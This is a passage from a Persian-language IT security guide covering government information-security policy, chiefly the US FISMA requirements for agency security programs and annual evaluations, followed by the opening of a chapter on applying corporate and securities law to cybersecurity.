‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺠﺎﻡ ﺩﻫﻨﺪ ﻭ ﮔﺎﻣﻬـﺎﻱ ﺩﻳﮕـﺮﻱ ﻧﻴـﺰ‬
‫ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺩﺍﺭﻧـﺪ‪ .‬ﺩﺭ ﻣـﺎﺭﺱ ‪ ۲۰۰۱‬ﺷـﻮﺭﺍﻱ‬
‫ﻭﺯﺍﺭﺗــﻲ ﮔــﺴﺘﺮﺵ ﺭﺍﻫﺒــﺮﻱ ﻣﻜــﺎﻧﻴﺰﻩ ﻋﻤــﻮﻣﻲ‪ ٥٧‬ﺑــﺮﺍﻱ ﺗﻤــﺎﻡ‬
‫ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺩﻭﻟﺘﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻣﻨﺘﺸﺮ ﺳﺎﺧﺖ‪ ٥٨.‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﺯﻣﺎﻧﻴﻜﻪ ﻛﻨﮕﺮﺓ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‬
‫ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪ ﻛﻪ ﺑﺨﺶ ﺍﺟﺮﺍﻳـﻲ ﺩﻭﻟـﺖ‪ ،‬ﺳـﻄﺢ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺍﺭﺗﻘﺎ ﻧﺪﺍﺩﻩ ﺍﺳﺖ‪،‬‬
‫ﻣﺼﻮﺑﺔ ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﻭﻟـﺖ )‪ ٥٩(FISMA‬ﺭﺍ ﺍﺑـﻼﻍ‬
‫ﻛﺮﺩ ﺗﺎ ﻧﻴﺎﺯﻣﻨﺪﻳﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ ﺭﺍ ﺭﻭﺷـﻦ‬
‫ﻛﻨﺪ‪ ٦٠.‬ﺩﺭ ﺗﻮﻧﺲ ﻧﻴﺰ ﻣﺸﺎﺑﻪ ﻫﻤﻴﻦ ﻣـﺴﺌﻠﻪ ﺻـﻮﺭﺕ ﭘـﺬﻳﺮﻓﺖ ﻭ‬
‫ﺩﻭﻟﺖ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۲‬ﻗﻮﺍﻧﻴﻨﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺗﺼﻮﻳﺐ ﻭ ﺍﺑﻼﻍ‬
‫ﻛﺮﺩ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻣﻮﻇـﻒ ﺑﻮﺩﻧـﺪ ﺑـﺼﻮﺭﺕ‬
‫ﺳﺎﻟﻴﺎﻧﻪ ﻣﻮﺭﺩ ﻣﻤﻴﺰﻱ‪ ٦١‬ﺳﺎﻟﻴﺎﻧﺔ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪٢٤٢‬‬
‫ﺍﻓﺸﺎﺳﺎﺯﻱ‪ ،‬ﺍﺧﺘﻼﻝ‪ ،‬ﺗﻐﻴﻴﺮ‪ ،‬ﻳﺎ ﭘﺎﻙ ﻛﺮﺩﻥ( ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﻭﺍﻗـﻊ‬
‫ﺷﻮﺩ؛‬
‫•‬
‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ‪:‬‬
‫‪ o‬ﺑﺮ ﺍﺳﺎﺱ ﻓﺮﺁﻳﻨﺪ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ؛‬
‫‪ o‬ﻣﻨﺠﺮ ﺑﻪ ﻛﺎﻫﺶ ﻫﺰﻳﻨﻪﻫـﺎﻱ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻣﻲﺷﻮﻧﺪ؛‬
‫‪ o‬ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﭼﺮﺧـﺔ‬
‫ﺣﻴﺎﺕ ﺳﻴﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺑـﺼﻮﺭﺕ‬
‫ﻛﺎﻣﻞ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﺪﻩ ﺍﺳﺖ؛ ﻭ‬
‫‪ o‬ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛـﻪ ﺍﻟﺰﺍﻣـﺎﺕ ﻭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫‪٦٥‬‬
‫ﺍﻣﻨﻴﺘﻲ ﺍﺩﺍﺭﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟـﻪ ﺭﻳـﺰﻱ )‪،OMB‬‬
‫ﺑﺨﺸﻲ ﺍﺯ ﺩﻓﺘﺮ ﺍﺟﺮﺍﻳﻲ ﺭﺋﻴﺲ ﺟﻤﻬﻮﺭ( ﺑﺮﺁﻭﺭﺩﻩ ﻣﻲﺷﻮﺩ؛‬
‫•‬
‫ﺗﻬﻴــﺔ ﻃﺮﺣﻬــﺎﻱ ﻓﺮﻋــﻲ ﺑــﺮﺍﻱ ﻓــﺮﺍﻫﻢ ﻛــﺮﺩﻥ ﺍﻣﻨﻴــﺖ‬
‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﻄﺢ ﻛﺎﻓﻲ ﺑـﺮﺍﻱ ﺷـﺒﻜﻪﻫـﺎ‪ ،‬ﺍﻣﻜﺎﻧـﺎﺕ‪ ،‬ﻭ‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ؛‬
‫•‬
‫ﺑﺮﮔﺰﺍﺭﻱ ﺩﻭﺭﻩﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ‬
‫ﻛﺎﺭﻛﻨـــﺎﻥ ﺳـــﺎﺯﻣﺎﻥ‪ ،‬ﭘﻴﻤﺎﻧﻜـــﺎﺭﺍﻥ ﻭ ﺳـــﺎﻳﺮ ﻛـــﺎﺭﺑﺮﺍﻥ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ؛‬
‫•‬
‫ﺁﺯﻣﻮﺩﻥ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺘﻨﺎﻭﺏ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻃﻼﻋــﺎﺕ‪ ،‬ﺭﻭﺍﻟﻬــﺎ ﻭ ﺗﺠﺮﺑﻴــﺎﺕ‪ ،‬ﻛــﻪ ﺷــﺎﻣﻞ ﺁﺯﻣــﻮﺩﻥ‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ‪ ،‬ﻋﻤﻠﻜﺮﺩﻱ ﻭ ﻓﻨﻲ ﻣﻲﺑﺎﺷﺪ؛‬
‫•‬
‫ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﺮﺍﻱ ﻃﺮﺍﺣﻲ‪ ،‬ﺍﺟﺮﺍ‪ ،‬ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﻣـﺴﺘﻨﺪﺳﺎﺯﻱ‬
‫ﻋﻤﻠﻴﺎﺕ ﻧـﺎﮔﺰﻳﺮﻱ ﺑـﺮﺍﻱ ﺟﺒـﺮﺍﻥ ﻧﻘـﺎﺋﺺ ﺩﺭ ﺳﻴﺎﺳـﺘﻬﺎ‪،‬‬
‫ﺭﻭﺍﻟﻬﺎ‪ ،‬ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺗﻲ ﺳﺎﺯﻣﺎﻥ؛‬
‫•‬
‫ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ‪ ،‬ﮔـﺰﺍﺭﺵ ﻭ ﭘﺎﺳـﺦ ﺑـﻪ ﻭﻗـﺎﻳﻊ‬
‫ﺍﻣﻨﻴﺘﻲ؛ ﻭ‬
‫•‬
‫ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﻃﻤﻴﻨــﺎﻥ ﺍﺯ ﺗــﺪﺍﻭﻡ ﻓﻌﺎﻟﻴــﺖ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺳﺎﺯﻣﺎﻥ‪.‬‬
‫ﻋﻤﻠﻜﺮﺩﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻃﺮﺣﻬـﺎ ﻭ ﮔﺰﺍﺭﺷـﺎﺕ ﺩﻳﮕـﺮ ﻧﻴـﺰ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ؛ ﺍﺯ ﺟﻤﻠـﻪ ﺁﻧﺪﺳـﺘﻪ ﻛـﻪ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ ﺑﻮﺩﺟـﺔ‬
‫ﺳﺎﻟﻴﺎﻧﺔ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﻣﺪﻳﺮﻳﺖ ﻣﺎﻟﻲ‪ ،‬ﺣﺴﺎﺑﺮﺳﻲ ﺩﺍﺧﻠﻲ ﻭ ﻛﻨﺘﺮﻟﻬـﺎﻱ‬
‫ﺭﺍﻫﺒـﺮﻱ ﻫــﺴﺘﻨﺪ‪ .‬ﭼﻨﺎﻧﭽــﻪ ﺩﺭ ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﺭﻭﺍﻟﻬــﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫــﺎ‬
‫ﻫﺮﮔﻮﻧﻪ ﺍﺷﻜﺎﻟﻲ ﭘﻴﺪﺍ ﺷﻮﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﺷﻜﺎﻝ ﺑﻪ ﺍﺩﺍﺭﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ‬
‫ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﻭ ﻛﻨﮕﺮﻩ ﮔﺰﺍﺭﺵ ﮔﺮﺩﺩ‪.‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳـﺪ ﻫﻤـﻪﺳـﺎﻟﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﻣﻨﻴﺘـﻲ ﻣـﺴﺘﻘﻠﻲ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻣﺸﺨﺺ ﻛﺮﺩﻥ ﺗﺄﺛﻴﺮ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋـﺎﺗﻲ ﻭ ﻋﻤﻠﻜﺮﺩﻫـﺎﻱ‬
‫ﺧﻮﺩ ﺍﺭﺍﺋـﻪ ﺩﻫﻨـﺪ‪ .‬ﻫـﺮ ﺍﺭﺯﻳـﺎﺑﻲ ﺩﻭ ﻗـﺴﻤﺖ ﺩﺍﺭﺩ‪ :‬ﻗـﺴﻤﺖ ﺍﻭﻝ‬
‫ﺑﺮﺭﺳــﻲ ﺗــﺄﺛﻴﺮ ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ ﺍﻣﻨﻴــﺖ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻳﻚ ﺯﻳـﺮﺑﺨﺶ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺳـﺎﺯﻣﺎﻥ؛ ﻭ‬
‫ﻗﺴﻤﺖ ﺩﻭﻡ ﻳﻚ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ‪ ،‬ﺭﻭﺍﻟﻬـﺎ‪ ،‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ‬
‫‪٦٦‬‬
‫ﺧﻂﻣﺸﻲﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺗﺒﻂ‪.‬‬
‫‪ FISMA‬ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺗﻤﺎﻣﻲ ﺳﻴﺎﺳـﺘﻬﺎ‬
‫ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻧﻤﺎﻳﻨﺪﺓ ﺍﺩﺍﺭﺓ ﻣﺪﻳﺮﻳﺖ ﻭ‬
‫ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﺗﻬﻴـﻪ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻫﻤـﺔ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺳﺮﭘﺮﺳـﺘﻲ ﻛﻨـﺪ‪.‬‬
‫‪ FIMSA‬ﻫﻤﭽﻨــﻴﻦ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﺭﺍﻫﺒﺮﺩﻫــﺎ ﻭ‬
‫ﭘﻴﺸﻨﻴﺎﺯﻫﺎﻱ ﺣﺪﺍﻗﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ٦٧،‬ﺍﺧﺘﻴـﺎﺭﺍﺕ ﻻﺯﻡ ﺭﺍ ﺑـﻪ‬
‫ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﻋﻠـﻮﻡ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭﺍﮔـﺬﺍﺭ ﻛـﺮﺩﻩ ﻭ ﻧﻤﺎﻳﻨـﺪﺓ ﺍﺩﺍﺭﺓ‬
‫ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺁﻭﺭﺩﻩ ﺷـﺪﻥ ﺍﻳـﻦ‬
‫ﻧﻴﺎﺯﻫﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﺪ ﻭ ﺣﺪﺍﻗﻞ ﺳﺎﻟﻲ ﻳﻜﺒﺎﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻥ ﺭﺍ ﻣــﺮﻭﺭ ﻭ ﺍﺻــﻼﺡ ﻧﻤﺎﻳــﺪ‪ .‬ﻧﻤﺎﻳﻨــﺪﺓ ﺍﺩﺍﺭﺓ‬
‫ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﻣﺴﺌﻮﻝ ﺍﺭﺍﺋﻪ ﮔﺰﺍﺭﺵ ﺳـﺎﻟﻴﺎﻧﻪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫‪٦٨‬‬
‫ﺑﺎﺯﺩﻩ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻛﻨﮕﺮﻩ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﺧــﺼﻮﺹ ﻛﻔﺎﻳــﺖ ﻭ ﺍﺛﺮﺑﺨــﺸﻲ ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ‬
‫ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻴﺰﺍﻥ ﺗﻄﺎﺑﻖ ﺁﻧﻬﺎ ﺑﺎ‬
‫ﻋﻨﺎﺻﺮ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻫﺮ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﻳـﺪ‬
‫ﺑــﻪ ﻧﻤﺎﻳﻨــﺪﺓ ﺍﺩﺍﺭﺓ ﻣــﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟــﻪﺭﻳــﺰﻱ ﻭ ﻛﻤﻴﺘــﻪﻫــﺎﻱ‬
‫ﻛﻨﮕﺮﻩﺍﻱ‪ ،‬ﻳﻚ ﮔـﺰﺍﺭﺵ ﺳـﺎﻟﻴﺎﻧﻪ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳـﺪ‪ .‬ﺑﻌـﻼﻭﻩ ﻣﻴـﺰﺍﻥ‬
‫ﻛﻔﺎﻳﺖ ﻭ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺭﻭﻧـﺪﻫﺎ ﻭ‬
‫‪Office of Management and Budget‬‬
‫‪65‬‬
‫‪Title 44, United States Code, section 3545‬‬
‫‪Title 40, United States Code, section 11331‬‬
‫‪Title 44, United States Code, section 3543‬‬
‫‪66‬‬
‫‪67‬‬
‫‪68‬‬
‫‪٢٤٣‬‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﻓﺼﻞ ﺳﻮﻡ‬
‫ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺑﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ‬
‫ﺍﻧﺘﻘﺎﻝ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺳﻨﺘﻲ‬
‫ﺑﻪ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﻓﺸﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃـﺮﻑ ﺑـﺎﺯﺍﺭ ﺑـﺮﺍﻱ ﺑـﺮﺁﻭﺭﺩﻩ ﻛـﺮﺩﻥ‬
‫ﺍﻣﻨﻴﺖ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻣﻲﺁﻳﺪ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺍﻳـﻦ‬
‫ﺯﻣﻴﻨﻪ ﻳﻚ ﻋﺎﻣﻞ ﺍﻧﮕﻴﺰﺷﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺷـﺮﻛﺘﻬﺎ ﺑـﺎ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ‬
‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺑﺮﺁﻣﺪﻩ ﺍﺯ ﻣﻔﺎﻫﻴﻢ ﺳـﻨﺘﻲ ﭼـﻮﻥ ﻗـﻮﺍﻧﻴﻦ ﺷـﺮﻛﺘﻬﺎ‪،‬‬
‫ﻗﻮﺍﻧﻴﻦ ﻗﺮﺍﺭﺩﺍﺩﻫﺎ ﻭ ﻗﻮﺍﻧﻴﻦ ﭘﺎﺳﺨﮕﻮ ﺑﻮﺩﻥ )ﺑـﺮﺍﻱ ﺟﺒـﺮﺍﻥ ﺧـﺴﺎﺭﺍﺕ‬
‫ﻋﻤﺪﻱ ﻭ ﻏﻴﺮﻋﻤﺪﻱ( ﻣﻮﺍﺟﻪ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻗﻮﺍﻧﻴﻦ ﺟﺪﻳﺪﺗﺮ‬
‫ﻧﻈﻴﺮ ﺛﺒﺖ ﻭ ﻓﺮﻭﺵ ﺍﻣﻦ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ ﺩﺭ ﻣﺒـﺎﺩﻻﺕ ﻋﻤـﻮﻣﻲ ﻭ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻣﻌﺎﻣﻼﺕ ﻓﺮﻳﺒﻨـﺪﻩ ﻭ ﻧﺎﻋﺎﺩﻻﻧـﻪ ﺗﺠـﺎﺭﻱ ﺭﺍ ﭘـﻴﺶ‬
‫ﺭﻭﻱ ﺧﻮﺩ ﻣﻲﺑﻴﻨﻨﺪ‪ .‬ﻧﺤـﻮﺓ ﺗﻄﺒﻴـﻖ ﺍﻳـﻦ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺳـﻨﺘﻲ‬
‫ﻗﺎﻧﻮﻧﻲ ﺑﻪ ﺣﻮﺯﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻮﺟﻪ ﻭ ﺗـﻼﺵ ﺯﻳـﺎﺩﻱ ﺭﺍ‬
‫ﻣﻌﻄﻮﻑ ﺧﻮﺩ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭ ﺑﺎ‬
‫ﻭﺿﻊ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﻳﺎ ﺻﺪﻭﺭ ﺑﺨﺸﻨﺎﻣﻪﻫـﺎ ﻭ ﺁﻳـﻴﻦﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﭼﻨـﻴﻦ ﺿـﻮﺍﺑﻄﻲ ﺣﺘـﻲ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻧﻴﺰ ﺑﻨﺪﺭﺕ ﻳﺎﻓﺖ ﻣـﻲ ﺷـﻮﺩ‪ ،‬ﺑﺨـﺸﻲ ﺍﺯ ﺗﻼﺷـﻬﺎﻱ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ﻫﺮ ﻛﺸﻮﺭ ﺍﻋﻢ ﺍﺯ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ ﻭ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺻـﺮﻑ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﻮﺩ‬
‫)ﻣﺴﺎﺋﻠﻲ ﻧﻈﻴﺮ ﺗﻮﺟﻪ ﺑـﻪ ﭼﮕـﻮﻧﮕﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻔـﺎﻫﻴﻢ ﻗـﺎﻧﻮﻧﻲ ﺳـﻨﺘﻲ ﺩﺭ‬
‫ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ(‪.‬‬
‫ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺭﻭﺷﻬﺎﻳﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣـﻲ ﺩﻫـﻴﻢ ﻛـﻪ ﺩﺭ‬
‫ﺁﻧﻬﺎ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﺁﻧﭽﻨﺎﻥ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ﻛﻪ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ .‬ﺩﺭ ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺻﺮﻓﹰﺎ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻧﻴﺰ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻗﻮﺍﻧﻴﻦ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﺩﺍﺭﺓ ﺳﺎﺯﻣﺎﻥ‪،‬‬
‫ﺣﺴﺎﺑﺪﺍﺭﻱ‪ ،‬ﻭ ﺛﺒﺖ ﻭ ﻓﺮﻭﺵ ﺍﻭﺭﺍﻕ ﺑﻬﺎﺩﺍﺭ‬
‫ﻃﺒﻖ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﻣـﺪﻳﺮﺍﻥ ﻭ ﻣـﺴﺌﻮﻻﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬
‫ﻗﺒﺎﻝ ﺳﺎﺯﻣﺎﻥ ﻭ ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺁﻥ ﺗﻌﻬﺪ ﻛﻨﻨﺪ ﻛﻪ ﭘﻴﺶﺑﻴﻨﻲ ﺩﻗﻴﻘﻲ‬
‫ﺍﺯ ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ ﺳـﺎﺯﻣﺎﻥ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑﻄـﻮﺭ‬
‫ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭﺣﺎﻝ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﭘـﻴﺶﺑﻴﻨـﻲ‪ ،‬ﺷـﺎﻣﻞ‬
